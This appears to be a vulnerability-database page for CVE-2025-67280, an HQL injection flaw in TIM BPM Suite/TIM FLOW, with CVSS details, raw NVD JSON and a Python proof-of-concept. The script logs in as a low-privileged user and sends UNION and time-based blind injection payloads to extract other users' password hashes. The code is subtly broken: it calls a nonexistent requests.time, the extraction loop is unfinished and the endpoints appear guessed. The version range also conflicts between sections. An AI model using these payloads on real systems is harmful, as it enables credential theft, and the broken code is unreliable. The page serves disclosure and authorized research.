Security Vulnerability Report
中文
CVE-2025-67280 CVSS 5.4 MEDIUM

CVE-2025-67280

Published: 2026-01-09 16:16:07
Last Modified: 2026-01-22 21:33:33
Source: [email protected]

Description

In TIM BPM Suite/ TIM FLOW through 9.1.2 multiple Hibernate Query Language injection vulnerabilities exist which allow a low privileged user to extract passwords of other users and access sensitive data of another user.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:tim-solutions:tim_flow:*:*:*:*:*:*:*:* - VULNERABLE
TIM BPM Suite < 9.1.2
TIM FLOW < 9.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67280 PoC - HQL Injection in TIM BPM Suite/TIM FLOW # This PoC demonstrates how a low-privileged user can exploit HQL injection # to extract password hashes of other users import requests import json from urllib.parse import urlencode TARGET_URL = "https://vulnerable-tim-server.com" LOGIN_URL = f"{TARGET_URL}/api/auth/login" INJECT_ENDPOINT = f"{TARGET_URL}/api/search/users" def login(username, password): """Authenticate with low-privileged account""" session = requests.Session() payload = { "username": username, "password": password } response = session.post(LOGIN_URL, json=payload) if response.status_code == 200: return session return None def exploit_hql_injection(session): """Execute HQL injection to extract password hashes""" # Malicious HQL payload to extract user passwords # This payload attempts to modify the query logic to bypass restrictions malicious_input = "admin' UNION SELECT password FROM users WHERE '1'='1" params = { "searchTerm": malicious_input, "filter": "all_users" } headers = { "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest" } response = session.get(INJECT_ENDPOINT, params=params, headers=headers) if response.status_code == 200: data = response.json() print(f"[+] Successfully extracted data: {json.dumps(data, indent=2)}") return data else: print(f"[-] Exploitation failed: {response.status_code}") return None def extract_all_passwords(session): """Extract all user passwords using blind HQL injection""" passwords = [] for user_id in range(1, 100): # Time-based blind injection to extract passwords character by character payload = f"' AND (SELECT CASE WHEN SUBSTR((SELECT password FROM users WHERE id={user_id}),1,1)='a' THEN SLEEP(5) ELSE 0 END) AND '1'='1" params = {"searchTerm": payload} start_time = requests.time.time() response = session.get(INJECT_ENDPOINT, params=params, timeout=10) elapsed = requests.time.time() - start_time if elapsed >= 5: print(f"[+] Character found for user {user_id}") # Continue extracting full password... return passwords if __name__ == "__main__": # Step 1: Login with low-privileged account session = login("low_priv_user", "password123") if not session: print("[-] Authentication failed") exit(1) print("[+] Successfully authenticated with low-privileged account") # Step 2: Exploit HQL injection vulnerability exploit_hql_injection(session)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67280", "sourceIdentifier": "[email protected]", "published": "2026-01-09T16:16:07.397", "lastModified": "2026-01-22T21:33:32.567", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In TIM BPM Suite/ TIM FLOW through 9.1.2 multiple Hibernate Query Language injection vulnerabilities exist which allow a low privileged user to extract passwords of other users and access sensitive data of another user."}, {"lang": "es", "value": "En TIM BPM Suite/ TIM FLOW hasta la versión 9.1.2 existen múltiples vulnerabilidades de inyección de Hibernate Query Language que permiten a un usuario con bajos privilegios extraer contraseñas de otros usuarios y acceder a datos sensibles de otro usuario."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-564"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tim-solutions:tim_flow:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.1.2", "matchCriteriaId": "071D6670-88DB-4539-A1F9-1850251BDD53"}]}]}], "references": [{"url": "https://tim-doc.atlassian.net/wiki/spaces/eng/pages/230981636/Release+Notes", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.y-security.de/news-en/tim-bpm-suite-tim-flow-multiple-vulnerabilities/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.